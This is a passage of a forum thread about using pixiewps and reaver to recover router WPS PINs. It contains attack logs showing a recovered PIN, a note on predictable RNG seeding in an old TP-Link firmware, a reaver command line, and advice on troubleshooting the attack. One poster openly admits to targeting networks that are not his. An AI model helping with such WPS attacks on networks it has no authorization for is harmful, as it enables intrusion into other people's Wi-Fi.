    [Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie Dust-][*] PSK1: 76:46:96:c7:5d:e4:8a:86:.......
    [Pixie-Dust][*] PSK2: 1b:5e:3e:6b:19:89:4b:5c:.......
    [Pixie-Dust] [+] WPS pin: 41368541
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    [+] Received message M3
    [+] Sending message M4

    If someone wants this version, tell me



    Now with relation to the TP-Link.

    I believe it may be vulnerable to another type of problem.

    I have a TP-Link 740N v1, it is a very old router, I think from 2004-2005


    It has the Atheros chipset, runs Linux and uses hostap together with /dev/random.

    But this firmware version for example has a problem in the generation of random numbers, it may be that this firmware version is with this problem.

    The seed for generating the random number is based on the date (date, time, seconds) router

    Every time I restart the modem, the seed to generate the random number is the same. So it is possible to make bruteforce on all dates, hours, seconds to find the current state of the seed. This makes it possible to generate future seeds to make bruteforce the pin.


    It may be that this problem is only in this firmware version, do not have other routers to test or compare and without having them in the hands is difficult to make the tests.

    But this problem certainly is present in many other models of routers.


    Today I met a router where the E-Hash1 and the E-Hash2 were identical and it was necessary to make a modification in pixie for it to do the bruteforce correctly.

    I will continue to develop and when I have more news come back to post.

    Sorry for the English, I used a translator
    Hello,

    I'm trying to test Ralink RT2860 (exactly same as the example above) but it constantly gives me an error "WPS transaction failed (0x04)" and I can't get any m3, m4 messages or e-hashes. Please, any solutions?
    Last edited by whitetsagan; 2016-04-13 at 08:55.

  24. #224
    Join Date
    2016-Jan
    Posts
    99
    It may be the distance, obstacles, many factors. What does airodump show for the PWR and RXQ of that AP?

  25. #225
    Join Date
    2016-Apr
    Posts
    10
    The power is between -65 and -70. I also tried to test one by sitting right next to it. I don't think it has anything to do with obstacles and stuff. The router is from Huawei. And reaver says:

    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Name: Ralink Wireless Access Point
    [P] WPS Model Number: RT2860

    Wash indicates that WPS is not locked. Super confused. Please, help?
    Last edited by whitetsagan; 2016-04-13 at 15:43.

  26. #226
    Join Date
    2016-Apr
    Posts
    10
    Please, anyone?

  27. #227
    Join Date
    2016-Apr
    Posts
    1
    It does nothing but keeps authenticating for hours. The authentication process is always successful but at the end it creates another authentication process, and so on.

    Did anyone have that kind of problem with pixiewps?

  28. #228
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Maybe WPS is enabled but not configured.

  29. #229
    Join Date
    2016-Apr
    Posts
    10
    Quote Originally Posted by soxrok2212 View Post
    Maybe WPS is enabled but not configured.
    Does that mean it is a no go?

  30. #230
    Join Date
    2016-Jan
    Posts
    99
    Post what "airodump-ng wlan0mon --wps" gives. As soxrok said, it may not be configured

  31. #231
    Join Date
    2016-Apr
    Posts
    10
    Quote Originally Posted by bob79 View Post
    Post what "airodump-ng wlan0mon --wps" gives. As soxrok said, it may not be configured
    Thanks. .
    Last edited by whitetsagan; 2016-04-29 at 15:59.

  32. #232
    Join Date
    2013-Sep
    Posts
    262
    you should edit your pictures (it doesn't look like you are testing your network)
    anyway your problem is not a pixiewps issue: getting the hashes is one thing, handled by other programs (and you can do it yourself by having a look at your capture file); pixiewps is "just" about using these hashes to get the PIN.
    Last edited by kcdtv; 2016-04-28 at 20:02.

  33. #233
    Join Date
    2016-Apr
    Posts
    10
    Brother, haha. Let's be honest, you, me, we all know we are not trying to get reaver/pixie working just to mess with our own network. FYI, I have got one exactly the same as this network, just not at the moment, which throws the same error. Trust me on this one. :P But even though I have my own, I don't have access to the network config though.

    I am well aware that it is not about pixie. It's about reaver. The reason why I am here is that nobody is there to give a proper answer in other discussions. And I tend to see experts who are modifying reaver prowl around here. So please share what you know about this. Have I been honest enough? I pretty much think so. :P

  34. #234
    Join Date
    2013-Sep
    Posts
    262
    Brother, haha. Let's be honest, you, me, we all know we are not trying to get reaver/pixie working just to mess with our own network.
    bro', I am not judging you or telling you what to do or not.
    My point of view is not moral, I am not an administrator or moderator of this forum and I really don't care about what you do at your home, that's not my business and I am not a cop, **** no!
    The point is that if you are not in good conditions with a real knowledge of the configuration of the access point ... if you get "error code 04 wps transaction failed" or something like this there could be so many reasons... from interferences made by other associated clients, to the RXQ you get, you don't even know if WPS is properly enabled,
    So "experts" will tell you to get closer to the access point, to disconnect all devices when you make your test, to raise the delay between PINs...
    I can give you an example: the Spanish Livebox 2.1 will let you send a PIN just if you are very very close to the access point with delay 5 and will handle one PIN out of 5. It is not a defense mechanism or something like that, just the way WPS is implemented (badly)
    while you could PIN brute force fast as **** other devices in bad conditions that would not even allow you to reach 1 MBps when you connect to them in the same conditions...
    So if you are on a "Spanish Livebox 2.1" kind of router, there is nothing you can do, no bug, and nothing to tell you... when I see this default SSID I imagine one of these crappy "boxes" with so little range that I can easily imagine why you cannot "reaver" it if you are more than 10 meters away from the device..
    Anyway, you are not giving enough elements to answer you... the scan with airodump-ng should be done with the --bssid filter and --channel filter, we should see the output of your probes to get info about the device, we should get an exact stdout of what is going on with reaver.
    The reason why I am here is that nobody is there to give a proper answer in other discussions.
    If this topic is about pixiewps: do you think it is respectful for wiire, who made this tool for all of us, to use his thread to ask whatever you want? If everybody does like you, what would be the result?
    Have I been honest enough? I pretty much think so. :P
    You know .. be honest with your girl (or boy), be honest with your bro' and mum... but with the rest.. be clever.
    Saying in a public forum that you are "hacking" networks and uploading pictures with the full BSSID and ESSID of these networks is not clever.
    That's why I recommend you to "edit" your pictures by erasing the end of the BSSID and ESSID... because doing like you do is like declaring to the whole world "here I am! Check these MACs and ESSIDs; I live 25 meters away!"
    Well, my point is: please, reconsider the way you act in this thread, I think it is a shame to "deviate" it and this forum is full of shitty and useless themes that you could use to ask questions. But the work from wiire and this thread is without any doubt one of the best and most useful in this whole forum, please, respect it and help to respect it.
    take care

  35. #235
    Join Date
    2016-Apr
    Posts
    10
    Quote Originally Posted by t6_x View Post
    Finally able to create my account in this forum

    [P] E-Nonce: 41:f2:8c:82:53:3b:df:........
    [P] PKE: 6b:0e:22:cb:cd:21:........
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Number: RT2860
    [+] Received message M1
    [P] AuthKey: f7:fb:bc:21:ab:3b:99:70:36:8e:f1:a0:........
    [+] Sending message M2
    [P] E-Hash1: 1e:d6:12:27:8f:12:28:21:9a:54:.........
    [P] E-Hash2: d:f:34:and:ac:55:a4:9e:b3:95:31:7a:61:b0:........
    [Pixie-Dust]
    [Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie Dust-][*] PSK1: 76:46:96:c7:5d:e4:8a:86:.......
    [Pixie-Dust][*] PSK2: 1b:5e:3e:6b:19:89:4b:5c:.......
    [Pixie-Dust] [+] WPS pin: 41368541
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    [+] Received message M3
    [+] Sending message M4

    If someone wants this version, tell me
    First I saw t6x's post above somewhere in this thread and thought I could find some useful information in it because the chipset he mentioned and mine are the same.

    Quote Originally Posted by kcdtv View Post
    bro', I am not judging you or telling you what to do or not.
    My point of view is not moral, I am not an administrator or moderator of this forum and I really don't care about what you do at your home, that's not my business and I am not a cop, **** no!
    The point is that if you are not in good conditions with a real knowledge of the configuration of the access point ... if you get "error code 04 wps transaction failed" or something like this there could be so many reasons... from interferences made by other associated clients, to the RXQ you get, you don't even know if WPS is properly enabled,
    So "experts" will tell you to get closer to the access point, to disconnect all devices when you make your test, to raise the delay between PINs...
    I can give you an example: the Spanish Livebox 2.1 will let you send a PIN just if you are very very close to the access point with delay 5 and will handle one PIN out of 5. It is not a defense mechanism or something like that, just the way WPS is implemented (badly)
    while you could PIN brute force fast as **** other devices in bad conditions that would not even allow you to reach 1 MBps when you connect to them in the same conditions...
    So if you are on a "Spanish Livebox 2.1" kind of router, there is nothing you can do, no bug, and nothing to tell you... when I see this default SSID I imagine one of these crappy "boxes" with so little range that I can easily imagine why you cannot "reaver" it if you are more than 10 meters away from the device..
    Anyway, you are not giving enough elements to answer you... the scan with airodump-ng should be done with the --bssid filter and --channel filter, we should see the output of your probes to get info about the device, we should get an exact stdout of what is going on with reaver.
    I tried reaver on my router by sitting right next to it and it was the same. Same error 0x04. My knowledge about this whole Kali thing is so shallow but I am very interested in it. But it's kind of sad there are so few to tell. I could try giving every bit of info needed.

    Quote Originally Posted by kcdtv View Post
    If this topic is about pixiewps : Do you think it is respectful for wiire who made this tool for all of us to use his thread to ask whatever yo want? If everybody does like you, what would be the result?

    You know... be honest with your girl (or boy), be honest with your bro' and mum... but with the rest... be clever.
    Saying in a public forum that you are "hacking" networks and uploading pictures with the full BSSID and ESSID of these networks is not clever.
    That's why I recommend you to "edit" your pictures by erasing the end of the BSSID and ESSID... because doing like you do is like declaring to the whole world "here I am! Check these MACs and ESSIDs; I live 25 meters away!"
    Well, my point is: please reconsider the way you act in this thread. I think it is a shame to "deviate" it, and this forum is full of shitty and useless themes that you could use to ask questions. But the work from wiire and this thread is without any doubt one of the best and most useful in this whole forum; please respect it and help to respect it.
    Take care.
    I understood everything so clearly that you could see Adele rolling from 1000 meters away. And yes, I have done a bad thing regarding morality, literally. I do have respect for those who are modifying and developing for nothing, too. I actually have almost nothing to say as defense and you got me real good. But also please try to understand and consider what I am mentioning, since we are in the bucket.

  36. #236
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    The same chipset doesn't mean anything. It's like saying my car has the same motor as yours, why doesn't it work? Every system may be configured differently: slightly different parts, different firmware, different implementations, perhaps they are not using the reference code supplied by the chip manufacturer. There are a plethora of possible solutions to your answer, and without the proper information we can't help. We need to know the model of the AP, chipset, manufacturer, if WPS is configured or not, and if you want to really get into it, it is best if you have administrator access so we can see the configuration of it and make an assessment from there.

  37. #237
    Join Date
    2016-May
    Posts
    1
    Dear, any solution for this issue of RTL8671? I am still waiting for any update for this stupid model RTL8671.

  38. #238
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    No. There will be an update if it is supported, no need to keep asking.

  39. #239
    Join Date
    2017-Jan
    Posts
    7
    You said it is an offline attack, right?
    So does this mean I can brute force when I am far from the AP,
    if I have all those parameter values?

  40. #240
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Yes, it is offline. Yes, you can brute force when you are far from the AP, but you need to have all the information gathered from it first, meaning you have to be near it at some point to get it.

  41. #241
    Join Date
    2016-Sep
    Posts
    8
    Got the WPS PIN using "reaver -i wlan0mon -b (insert bssid here) -vvv -W 2 (it is a Belkin router) -a -c (insert channel number here)", tried to get the password using the --pin= option in reaver and it gives me a hash-looking thing for the password. I still couldn't use that "hash" to connect to the network. I tried to disconnect all APs from the client as well as changing my MAC address to one of the APs connected on the network, still no success. However, I couldn't help but notice that each time I tried with the password I got from pixie, it got NACK errors, but every time I tried with a different WPS PIN than the correct one, it tests it and reports that it didn't work. Kinda stuck here. Some information: WPA and WPS (no WPA2), Belkin chipset, WPS is not locked and is, according to the command "wash -i wlan0mon", at version 1.0, and it does send out beacons frequently. I'm not very far away from the router, according to the wash command, -59. I just want to learn why this is happening and explore.

  42. #242
    RTL8671 and Linksys E900: is there any way to crack the WPS PIN of the above chipsets?

  43. #243
    Join Date
    2013-Jul
    Location
    Australia
    Posts
    2
    Quote Originally Posted by RAZERZDAHACKER
    Got the WPS PIN using "reaver -i wlan0mon -b (insert bssid here) -vvv -W 2 (it is a Belkin router) -a -c (insert channel number here)", tried to get the password using the --pin= option in reaver and it gives me a hash-looking thing for the password. I still couldn't use that "hash" to connect to the network. I tried to disconnect all APs from the client as well as changing my MAC address to one of the APs connected on the network, still no success. However, I couldn't help but notice that each time I tried with the password I got from pixie, it got NACK errors, but every time I tried with a different WPS PIN than the correct one, it tests it and reports that it didn't work. Kinda stuck here. Some information: WPA and WPS (no WPA2), Belkin chipset, WPS is not locked and is, according to the command "wash -i wlan0mon", at version 1.0, and it does send out beacons frequently. I'm not very far away from the router, according to the wash command, -59. I just want to learn why this is happening and explore.
    It didn't work for me at all, 0.00.

  44. #244
    Join Date
    2015-Mar
    Posts
    54
    We started a new thread for collecting data: https://forums.kali.org/showthread.p...ll=1#post75368
